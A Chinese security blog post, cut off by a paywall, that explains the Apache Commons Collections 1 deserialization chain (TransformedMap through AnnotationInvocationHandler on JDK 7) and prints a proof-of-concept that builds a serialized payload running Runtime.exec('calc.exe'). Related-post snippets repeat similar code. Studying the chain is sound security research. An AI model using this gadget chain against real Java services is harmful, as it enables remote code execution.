[Java安全]CommonCollections1_TransformedMap链

最新推荐文章于 2025-03-16 21:39:48 发布
原创 最新推荐文章于 2025-03-16 21:39:48 发布 · 762 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #web安全

该博客详细分析了Apache Commons Collections库中的TransformedMap和ChainedTransformer组件如何被滥用执行远程代码。通过构建一系列的InvokerTransformer,利用反射调用Runtime类的方法,最终达到执行命令的目的。在Java 7中,由于AnnotationInvocationHandler的readObject方法,可以触发此漏洞。然而,从Java 8u71开始,这一漏洞被修复,不再直接使用反序列化的Map,导致RCE难以触发。文章还探讨了漏洞利用的条件和限制。

CommonCollections1_TransformedMap

本机环境:

JDK版本:jdk1.7u_51

CC版本:Commons-Collections 3.1

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

public class CommonCollections1 {
   
   
    public static void main(String[] args) throws Exception {
   
   
        Transformer[] transformers = new Transformer[] {
   
   
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
   
   String.class, Class[].class }, new Object[] {
   
   "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
   
   Object.class, Object[].class }, new Object[] {
   
   null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {
   
   String.class }, new Object[] {
   
   "calc.exe"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
        innerMap.put("value", "value");
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        Object instance = ctor.newInstance(Target.class, outerMap);

        FileOutputStream f = new FileOutputStream("payload.bin");
        ObjectOutputStream fout = new ObjectOutputStream(f);
        fout.writeObject(instance);

        FileInputStream fi = new FileInputStream("payload.bin");
        ObjectInputStream fin = new ObjectInputStream(fi
最低0.47元/天 解锁文章
transform TransformedMap利用
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
01-25 656
引入环境: <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependency> <groupId>commons-collectio
Apache commons-collections反序列化漏洞(TransformedMap利用)
qq_43936524的博客
04-10 733
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
Java 反序列化漏洞-Apache Commons Collections1-TransformedMap 攻击
cjdgg的博客
02-08 2795
Java 反序列化漏洞-Apache Commons Collections前言前置知识TransformedMap 前言 前面已经学了一些Java反序列化漏洞的相关基础知识,今天就来学习分析一下Apache Commons Collections的反序列化漏洞 环境搭建推荐大家直接使用maven搭建,网上都有很多教程这里就不多说了 要寻找反序列化漏洞,最主要的是找到三个点: 入口点(kick-off),触发点(sink),调用(chain) 前置知识 TransformedMap org.apache.
JAVA反序列化之CommonCollections1利用
javaYY_的博客
07-08 363
之前简单学习了JAVA反序列化和URLDNS这条利用,讲过的基础就不再赘述了,今天来学习CommonCollections这条利用。由于这条相对于URLDNS比较复杂,为了更容易理解,所以首先采用P牛精简后的一段DEMO来理解这条利用:DEMO1 1package Commoncollections1; 2import org.apache.commons.collections.Transformer; 3import org.apache.commons.collections.funct
Java代码审计——Commons Collections TransformedMap调用
王嘟嘟的博客
11-05 1130
0x00 前言 CC最基础的就是迭代Java代码审计——Commons Collections 迭代调用,核心就是 ChainedTransformer的Transformer方法。那么TransformedMap就是可以调用此方法的一条。 0x01 TransformedMap调用 在CC包中, 有TransformedMap这样一个类,他在进行put,checkSetValue等方法时,可以触发transform方法,如下图所示。 1. 先上poc: Transformer[] trans
[Java安全]ysoserial_CommonCollections1_LazyMap
cosmoslin的博客
03-12 3712
ysoserial_CommonCollections1_LazyMap 本文分析yso中的利用 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collection
java反序列化学习——Common Collections 1
最新发布
ubaichu的博客
03-16 1125
Common Collections 1
java安全(八)TransformedMap构造POC
weixin_45694388的博客
07-31 1289
上一篇构造了一个了commons-collections的demo package test.org.vulhub.Ser; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; impo
java安全(七) 反序列化3 CC利用 TransformedMap
weixin_45694388的博客
04-21 3804
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Java安全之Commons Collection 1
weixin_45644323的博客
02-25 4189
cc1: public class Test1 { public static void main(String[] args) throws Exception{ Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new
[JAVA反序列化初学2] Commons-Collections1分析
GX233的博客
03-08 3841
[java反序列化初学2]CommonsCollections1分析
Commons-Collections1分析
weixin_45682070的博客
01-04 860
条件限制: ​JDK版本:jdk1.8以前(8u71之后已修复不可利用) CC版本:Commons-Collections 3.1-3.2.1 环境搭建: <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId&g
java 反序列化CC1分析(TransformedMap)
wsitcj的博客
03-14 1651
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
Java反序列化CC1-TransformedMap学习
ULGANOY的博客
09-23 1251
java反序列化CC1的简单学习记录
Common-Collections 1
Christ1na的博客
09-09 853
TransformedMap相同,这条同样在jdk8u71以后不能使用,原因也相同,变更后的AnnotationInvocationHandler#readObject不再直接使用反序列化得到的Map对象,所以不能够使用了
Commons-Collections1反序列化
m0_62770485的博客
12-05 827
JAVA安全-Commons-Collections1反序列化
Apache Commons Collections反序列化
why811的博客
08-17 385
Apache Commons Collections中有一个特殊的接口TransformerInvokerTransformer是实现了Transformer接口的一个类,这个类可以可以通过Java的反射机制来调用任意函数可以看到该InvokerTransformer类是实现Transformer接口的(Transformer接口主要用于转换并返回一个给定的Object对象),且其中的transform()方法采用反射机制进行任意函数调用,这就是漏洞点所在。
commons-collections1
……
03-24 657
Commons-Collections1反序列化
如何使用JAVA获取磁力
根据给定的文件信息,这里需要详细解释的知识点集中在如何使用Java语言来获取磁力接(Magnet URI)。磁力接是一种点对点(P2P)文件分享的标识符,通常用于BitTorrent网络。它包含了使客户端能够连接到共享特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值